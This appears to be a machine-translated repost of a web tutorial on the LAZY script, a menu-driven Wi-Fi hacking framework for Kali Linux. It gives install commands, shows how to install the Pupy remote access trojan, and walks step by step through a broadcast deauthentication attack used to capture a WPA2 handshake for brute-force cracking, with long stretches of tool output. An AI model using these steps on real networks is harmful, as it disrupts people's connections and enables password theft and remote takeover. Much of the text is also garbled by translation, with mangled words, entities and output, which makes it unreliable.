قالب وردپرس درنا توس
Home / Tips and Tricks / How to Make Wi-Fi & Networks Easier with Lazy Script «Null Byte :: WonderHowTo

How to Make Wi-Fi & Networks Easier with Lazy Script «Null Byte :: WonderHowTo



Wi-Fi tools are becoming more accessible to beginners, and the LAZY script is a framework of serious penetration tools that can easily be explored from there. This powerful and simple tool can be used in seconds from installing new add-ons to a WPA handshake. In addition, it is easy to install, set up and use.

Attack Framework

Most new Wi-Fi hacking tools are based on many of the same underlying attacks and scripts that automate other more familiar tools such as . Aireplay ng are often referred to as frameworks. These frameworks attempt to organize tools intelligently or usefully to bring them beyond the functionality or usability of the original program.

An excellent example of this are programs that use scan tools such as airodump-ng, attacks such as WPS Pixie dust and cracking tools such as Aircrack-ng to create an easy-to-understand attack chain for beginners. This makes the process of using these tools easier to remember and can be viewed as a kind of leadership. Although each of these attacks is possible without holding hands, the result can be faster or more convenient than trying to do it yourself.

An example of this is the Airgeddon framework, a wireless attack framework that does useful things, such as automating the target selection process and eliminating the time it takes for a user to copy and paste information between programs. This saves valuable time for experienced pentesters, but has the disadvantage that beginners do not understand what is happening "under the hood" of the attack. Although this is the case, most of these frameworks are fast, efficient, and easy to use, so even beginners can enable and disable a whole network.

UX / UI Improvements for Beginners

I'll go through a new script that tries to create a friendlier method for beginners to start with some of the best and most reliable hacking techniques. While the script is designed to be as "lazy" as possible, requiring a minimum of user interaction, it is also useful and powerful for novice or experienced users who want to perform a penetration test quickly.

The focus in attack frameworks is to better anticipate what the hacker is trying to do and gather the necessary tools to execute the attack with a minimum of user interaction. In this way, the user interface and experience become the main goal, and the purpose of the script is to anticipate the tools and tactics a penetration tester would need to quickly access in the field.

The LAZY script begins typing the letter l into a terminal window, asking for the first run after the name of your network interfaces. It uses the names you specify to connect to the tools required to perform the attacks you selected. Apart from this initial input, the majority of possible attacks can be performed simply by selecting the option number from the menu. This means you can grab a network handshake or download a new hacking tool like Pupy just by selecting from one of the menu options

Extending usability and curation applications

The benefit of the LAZY script is that that it was built with penetration testers in mind. This means it's essentially a guided tour of some of the best and most powerful scripts available today. Some of the most accessible menu options include quick access to network information such as the gateway IP (usually the router), your IP address, MAC address, and a scan that performs a ARP scan to all other devices to display the screen network

The primary submenus are also organized by functions that a PTEXter would like to have easy access to. The general focus is on handshakes, WPS PIN attacks, WEP attacks, MitM attacks, and the Metasploit framework. Anonsurf is also included for the analysis of Internet traffic, and social engineering attacks such as email spoofing are provided. If you see a tool in red, it means you do not have it yet. To get it, you can select it and type install and the script will do it for you.

  Tool is not installed. To install it, type & # 39; install & # 39; on.
To install
Install Dagon
Tool from Ekultek
In & # 39; Dagon & # 39; clone ...
remote: counting objects: 1236, done.
remote: total 1236 (delta 0), reused 0 (delta 0), packet reused 1235
Receiving objects: 100% (1236/1236), 319.35 KiB | 1.76 MiB / s, finished.
Resolution deltas: 100% (666/666), done.
Collect pysha3 == 1.0.2 (from -r requirements.txt (line 1))
Download from https://files.pythonhosted.org/packages/c5/bb/7d793dfab828e01adb46e3c5976fe99acda12a954c728427cceb2acd7ee9/pysha3-1.0.2-cp27-cp27mu-manylinux1_x86_64.whl (127kB)
100% | ██████████████████████████████ | 133 kB 1.5 MB / s
Requirement already met: Requests in /usr/lib/python2.7/dist-packages (from -r requests.txt (line2))
Collect colorlog == 2.10.0 (from -r requirements.tx (line 3))
Download from https://files.pythonhosted.org/packages/61/ff/d6337d488739c1a7ade37f736880e44717bcb0e7cea178c17774a4a93700/colorlog-2.10.0-py2.py3-none-any.whl
Requirement already met: passlib = 1.7.1 in /usr/lib/python2.7/dist-packages (from -r requirements.txt (line4))
Collect bcrypt == 3.1.3 (from -r requirements.txt (line 5))
Download from https://files.pythonhosted.org/packages/a6/da/5d7ac371b4c9a8ac9e8ea62cff7c090e9d7d7b7ea3f2ad8b8c8da65db058/bcrypt-3.1.3-cp27-cp27mu-manylinux1_x86_64.whl (57kB)
100% | ██████████████████████████████ | 61kB 9.9 MB / s
Requirement already met: six> = 1.4.1 in /usr/lib/python2.7/dist-packages (from bcrypt == 3.1.3 -> - r requirements.txt (line 5))
Cffi> = 1.1 (from bcrypt == 3.1.3 -> - r requirements.txt (line 5))
Download from https://files.pythonhosted.org/packages/14/dd/3e7a1e1280e7d767bd3fa15791759c91ec19058ebe31217fe66f3e9a8c49/cffi-1.11.5-cp27-cp27mu-manylinux1_x86_64.whl (407kB)
100% | ██████████████████████████████ | 409 kB 2.1 MB / s
Collect Pycparser (from cffi> = 1.1-> bcrypt == 3.1.3 -> - r requirements.txt (line 5))
Download from https://files.pythonhosted.org/packages/8c/2d/aad7f16146f4197a11f8e91fb81df177adcc2073d36a17b1491fd09df6ed/pycparser-2.18.tar.gz (245kB)
100% | ██████████████████████████████ | 256 kB 2.8MB / s
Collective Package Building Wheels: pycparser 

Step 1: Upgrading Kali Linux

To use the LAZY script, you need a fully updated version of Kali Linux. The script comes with a very helpful installer script, and I was able to set it up on both a laptop with Kali as the primary operating system and on a virtual machine without any problems.

If your potash system is fully updated, you can generally expect to expect a fairly smooth installation process. Make sure your system is up to date by running the following commands before you begin.

  apt update
apt upgrade 

Step 2: Find the name of your wireless network adapter

In the script, you must specify the name of the network adapter to use and the name that your system will use on the network as the network adapter mode. This may require some fixes. Normally, a Kali-compatible network adapter will be wlan0 or wlan1 and change its name to wlan0mon or wlan1mon in monitor mode. Sometimes you notice wlan0 stays wlan0 and will not be renamed when put into monitor mode, which means you need to set this up in the LAZY script, or it will fail because it is trying to use a wlan0mon interface which is not is working. t

You can check what name is in your adapter after putting it into monitor mode by using the following command and watching the adapter's name with the following command, where wlan0 is the name of your adapter ,

  iwconfig wlan0 mode monitor
ip a 

Once you know the name of the adapter and the name in monitor mode, we can start downloading and using the "lazy" script.

Step 3: Install and Configure Lazy Script

Installing the LAZY script is incredibly easy. To do this, you can open a terminal window and copy and paste the following code, line by line. You will copy cd in root, clone the LAZY script of GitHub, cd into the LAZY script, give the install.sh file execute permissions and then LAZY Install script.

  CD
Git clone https://github.com/arismelachroinos/lscript.git
CD script
chmod + x install.sh
./install.sh

When this is done, you should be able to open a new terminal window and type the letter l to open the LAZY script. You will need to follow and answer the instructions on the way when installing or reinstalling the script for the first time, and then setting the network interfaces. Not bad for a script based on minimal user interaction.

If you set the user interface, enter here the name of your wireless network adapter, both in managed and in monitor mode, and then the name of your Ethernet adapter

You can change this by using the Enter interface if you want to add another network adapter or switch between the internal and external network card. Once this is set, you can work with LAZY script.

Step 4: Use Basic Network Tools

At the beginning, we can access data over the network we are currently connected to, as well as any network interfaces, from the main menu. Here we can find local information by simply typing l to get local IP information (see below).

  Local IP addresses:
eth0 = 192.168.86.42

gateways:
eth0 = 192.168.86.1
Press any key to go back ... 

This will allow us, for example, to search the network for other devices. This part of the LAZY script gives us better network visibility and situational awareness about what devices are around us. The various pieces of information can be broken down as follows:

  • if – Runs ifconfig and gives the names and information about all network devices
  • 1 – Enable wlan0 ( d1 disables it)
  • 2 – Enable wlan0mon ( d2 disables it)
  • 3 – Randomize or set the MAC address to a specific value.
  • 7 – Display the public IP address that your computer leaves on visited websites. [196909035] 19 – Search for the physical address of a specific IP address to determine its relative location – Launch an ARP scan on the network to find nearby devices.
  • start – Start the monitor mode on the wireless network adapter.
  • stop – Stop wireless monitoring mode on the network adapter.

Step 5: Install New Tools

Part of the fun of LAZY scripts is how easy it is to add new tools to our arsenal. To demonstrate this, we're downloading Pupy, a Python-based RAT designed to take control of other computers on the network. We can select option 9 to access the list of tools in LAZY script.

In the next menu, the tools are divided into major categories, with options for managing the installation of scripts. The options presented are:

  • 1 – Wi-Fi tools (tools for attacking wireless networks)
  • 2 – Remote access (tools to remotely access other devices and keep them away from them manage).
  • 3 – Gathering information (collecting information about individuals or websites)
  • 4 – Website tools (tools for exploiting or attacking sites)
  • 5 – Other another collection of other hacking tools)

You can also manage your installed tools using 6 . To download Pupy, we go to option 2 which is remote access. Here's a list of tools for remote access, and we can choose option 3 for Pupy. Here we can see that Pupy is not installed because it appears in red.

To install Pupy, select 3 and if prompted, enter with LAZY script manages the installation for you.

  The tool is not installed. To install it, type & # 39; install & # 39; on.
To install
Installation of Pupy
Tool of n1nj4sec
In & # 39; pupy & # 39; clone ...
remote: counting objects: 16472, done.
remote: Compress objects: 100% (35/35), done.
Remote: Total 16472 (Delta 20), reused 47 (Delta 20), package reused 16416
Receiving objects: 100% (16472/16472), 27.77 MiB | 4.99 MiB / s, done.
Resolving deltas: 100% (11706/11706), done. 

Once completed, the option should be green, and you can use it via LAZY script. Now we can select the option 3 and immediately jump into Pupy to start creating listeners and payloads.

  1) Create a payload
2) Start the handset
b) Go back
00) Main menu
0) EXIT 

We can now enter 00 to return to the main menu to explore more features of the LAZY script.

Step 6: Capturing a WPA Handshake with a Lazy Script

The last feature of the LAZY script I'm going to introduce is the quick and easy way to get an WPA handshake for future cracking. This is useful if you want to hack a WPA network, which is by far the most common Wi-Fi network you can use. With this technique, you can quickly kick someone or something from the network you are aiming at and connect the network handshake of the device to the network.

With this handshake you can crack the hash with a brute-force attack. This best practice is one of the most critical vulnerabilities in WPA and one of the most important things fixed in the new WPA3.

After returning to the main menu, we can try one of the LAZY scripts. Menu features designed to capture a WPA (or WPA2) handshake for later cracking. If you have a Kali-compatible wireless network adapter, you should have passed that name to the LAZY script in step 3 above, or you can do so now by typing interfaces and the name of the adapter enter station and monitor mode

Once set, we can select 10 to select the handshake menu. First, you must confirm that you want to put the adapter into monitor mode, if you have not already done so. Simply enter y to confirm the adapter and place it in monitor mode. When this happens, a new terminal window opens. You'll see that no handshake was selected and a list of attack options.

  ---------------------------- HANDSCHALEN- ----------------- ----------
1) Scan nearby networks Selected: None
2) Record the handshake
3) Aircrack the handshake
4) Check a handshake
5) Clean a handshake
6) Remove .csv and .netxml files
0) Exit
Select: 

You can select the option number 1 to search for nearby networks, and you will see a list of nearby network traffic. Let it run for a minute or two and press Crtl-C to stop the scan.

  CH 12] [ Elapsed: 6 s ] [2018-07-04 04:33

BSSID PWR beacons #data, # / s CH MB ENC CIPHER AUTH ESSID

00: 25: 00: FF: 94: 73 -1 0 1 0 6 -1 OPN 
70: 3A: CB: DB: 5A: 78 - 41 11 3 0 11 130 WPA2 CCMP PSK takeyourgodd
70: 3A: CB: DB: 5C: A8 -59 22 0 0 6 130 WPA2 CCMP PSK takeyourgodd
70: 3A: CB: DB: 5C: B4 -71 6 0 0 1 130 WPA2 CCMP PSK takeyourgodd
C4: 8E: 8F: E5: 6A: B4 -75 7 0 0 1 195 WPA2 CCMP PSK TG1672G12

BSSID STATION PWR rate Lost frames sample

00: 25: 00: FF: 94: 73 veiled -43 0 -12 21 8
00: 25: 00: FF: 94: 73 veiled -33 0 -12 104 4
00: 25: 00: FF: 94: 73 veiled -51 0 -12 107 4
00: 25: 00: FF: 94: 73 veiled -53 0 -12 34 8
(not linked) veiled -70 0 - 1 12 8 

You see a list of networks of traffic where you can find targets for the next stage of the attack. This comes with a handy color code. Dial the number of the destination network and press return to continue. It is worth noting that you can return to this screen to select a different network by entering b in a later step so that you do not have to scan again.

After we have selected our destination network, we can either specify a filename to save the handshake or 0 to select no file to keep for this session. Name the file that you will remember later.

After typing in a name and pressing Return a new window will open, allowing you to see options for turning off devices from the network. Select the option 1 to de-authenticate all clients and quickly get the network handshake. Make sure you have the appropriate permission on the network you are working on because you are denying the network you are targeting until you receive the handshake. As the last input, select the number of packets to send, where 0 is a continuous stream until you decide to quit.

  --------------- -DEAUTH MENU ----------------

1) Deauth all aireplay-ng
2) Deauth all mdk3
3) Deauth client / s Aireplay ng
4) Deauth all periodic aireplay-ng
0) Exit 
  ------------------------------------------- HAND-SWITCHING -------------------------------------------

CH 11] [ Elapsed: 12 s ] [2018-07-04 04:33

BSSID PWR RXQ beacons #data, # / s CH MB ENC CIPHER AUTH ESSID

70: 3A: CB: DB: 5A: 78-40 87 134 92 6 11 130 WPA2 CCMP PSK takeyourgodd

BSSID STATION PWR rate lost frame probe

70: 3A: CB: DB: 5A: 78 obfuscated -72 0 - 0 22 6 

A new window will appear, indicating the status of the Deauthentication Attack. If you see the "WPA handshake" in the upper right corner, you know that you have received the handshake for the network. Press Ctrl-C to stop the Deauth attack.

  ---------------- DEAUTH MENU ------------- ---

1) Deauth all aireplay-ng
2) Deauth all mdk3
3) Deauth client / s Aireplay ng
4) Deauth all periodic aireplay-ng
ENTER) Last option
0) Exit 
  ------------------------------------------- HAND-SWITCHING -------------------------------------------

CH 11] [ Elapsed: 2 mins ][ 2018-07-04 04:36 ]  [WPA Handshake: 70: 3A: CB: DB: 5A: 78

BSSID PWR RXQ beacons #data, # / s CH MB ENC CIPHER AUTH ESSID

70: 3A: CB: DB: 5A: 78 -7 100 1307 151 2 11 130 WPA2 CCMP PSK takeyourgodd

BSSID STATION PWR rate lost frame probe

70: 3A: CB: DB: 5A: 78 fogged -33 1e - 1e 0 12 
  ---------------------------- ----- DEAUTHING ---------------------------------

04:36:17 Sending DeAuth (Code 7) to Broadcast - BBSID: [70:3A:CB:DB:5A:78]
04:36:18 Sending DeAuth (Code 7) to Broadcast - BBSID: [70:3A:CB:DB:5A:78]
04:36:18 Sending DeAuth (Code 7) to Broadcast - BBSID: [70:3A:CB:DB:5A:78]
04:36:19 Sending DeAuth (Code 7) to Broadcast - BBSID: [70:3A:CB:DB:5A:78]
04:36:19 Sending DeAuth (Code 7) to Broadcast - BBSID: [70:3A:CB:DB:5A:78]
04:36:19 Sending DeAuth (Code 7) to Broadcast - BBSID: [70:3A:CB:DB:5A:78]
04:36:20 Sending DeAuth (Code 7) to Broadcast - BBSID: [70:3A:CB:DB:5A:78]
04:36:20 Sending DeAuth (Code 7) to Broadcast - BBSID: [70:3A:CB:DB:5A:78]
04:36:21 Sending DeAuth (Code 7) to Broadcast - BBSID: [70:3A:CB:DB:5A:78]
04:36:21 Sending DeAuth (Code 7) to Broadcast - BBSID: [70:3A:CB:DB:5A:78]
04:36:22 Sending DeAuth (Code 7) to Broadcast - BBSID: [70:3A:CB:DB:5A:78]
04:36:22 Sending DeAuth (Code 7) to Broadcast - BBSID: [70:3A:CB:DB:5A:78]
04:36:23 Sending DeAuth (Code 7) to Broadcast - BBSID: [70:3A:CB:DB:5A:78]
04:36:23 Sending DeAuth (Code 7) to Broadcast - BBSID: [70:3A:CB:DB:5A:78] 

After selecting the network, you are in the "Handshake" menu. Here we can confirm the handshake just recorded by selecting option 4 to verify a handshake.

  -------------------- -------- HANDSCHALEN ------------------ ----------
1) Scan nearby networks Selected: takeyourgoddamnshoesoff
2) Record the handshake
3) Aircrack the handshake
4) Check a handshake
5) Clean a handshake
6) Remove .csv and .netxml files
0) Exit
Select: 

The Deauth menu displays the options that you can use to verify that you have successfully completed a handshake. Select option 2 to check the handshake with Cowpatty.

  ------- MENU -------

1) Check with pyrite
2) Check with cow patty
b) Go back
Choose:
1 
  ------------------------------------------- GLOVE-- -----------------------------------------

CH 11] [ Elapsed: 12 s ] [2018-07-04 04:37

BSSID PWR RXQ beacons #data, # / s CH MB ENC CIPHER AUTH ESSID

70: 3A: CB: DB: 5A: 78 -40 100 156 0 0 11 130 WPA2 CCMP PSK takeyourgodd

BSSID STATION PWR Rate Lost Frames Sample 

Here you can see that our handshake is valid:

  ------- DEAUTH MENU -------

Valid handshake found! 
  ------------------------------------------- Handshake --- ----------------------------------------

CH 11] [ Elapsed: 12 s ] [2018-07-04 04:37

BSSID PWR RXQ beacons #data, # / s CH MB ENC CIPHER AUTH ESSID

70: 3A: CB: DB: 5A: 78-37 96 297 0 0 11 130 WPA2 CCMP PSK takeyourgodd

BSSID STATION PWR Rate Lost Frames Sample 

After confirming that the handshake is valid, you will be returned to the handshake menu. Select option 0 to terminate the script.

  ---------------------------- HANDSCHALEN ---- -------------- ----------
1) Scan nearby networks Selected: takeyourgoddamnshoesoff
2) Record the handshake
3) Aircrack the handshake
4) Check a handshake
5) Clean a handshake
6) Remove .csv and .netxml files
0) Exit
Select: 

On your way out, the script asks if you have a WPA handshake. When you have done so, enter y to save the handshake that you entered under the file name you specified earlier. Otherwise, the file is discarded. If you keep the file, you can also enter y to clean up the file, which will make it smaller if all non-relevant packages that have been captured are deleted.

At this point we would use Aircrack-ng to launch a brute-force attack. I tried LAZY script's built-in Brute Forcer, but it could not read the location of my dictionary file properly, so I do not recommend it in its current iteration.

Step 7: Using a WPS Pixie-Dust Attack

While the LAZY script includes a WPS module, the versions that I tried in virtual machines and on a Kali laptop could did not successfully crack our test WPS PIN. Two of the primary attacks returned "too many arguments" and no useful results. The last option, a pixie-dust loop, ended with an error after an anticlimactic accumulation.

Network Hacking for the Lazy

LAZY script is a tool that tries to bring together the best tools with a minimum of interaction by common hackers Tools with a bunch of clever shell scripts. This makes the necessary tactics of Wi-Fi hacking, like WPA Brute-Forcing, accessible even to the most inexperienced users.

If you've gotten lazy at home with your Wi-Fi security, this is a wake-up call that you need to take things like setting your Wi-Fi password seriously. Do not choose a password that is easy or quick to guess or that you have already used in many other places. If you need a refresher on how to protect your own Wi-Fi, you can read my previous guide to protecting against the main types of Wi-Fi hacking, most of which contain LAZY scripts.

Do Not Miss: The Beginner's Guide to Protecting Against Wi-Fi Hacking

I hope you liked this tutorial on installing, configuring and hacking with LAZY script! If you have questions about this tutorial or LAZY script, do not hesitate to leave a comment or contact me on Twitter @KodyKinzie .

Cover picture and screenshots of Kody / Null Byte (unless otherwise stated) [19659099]

Source link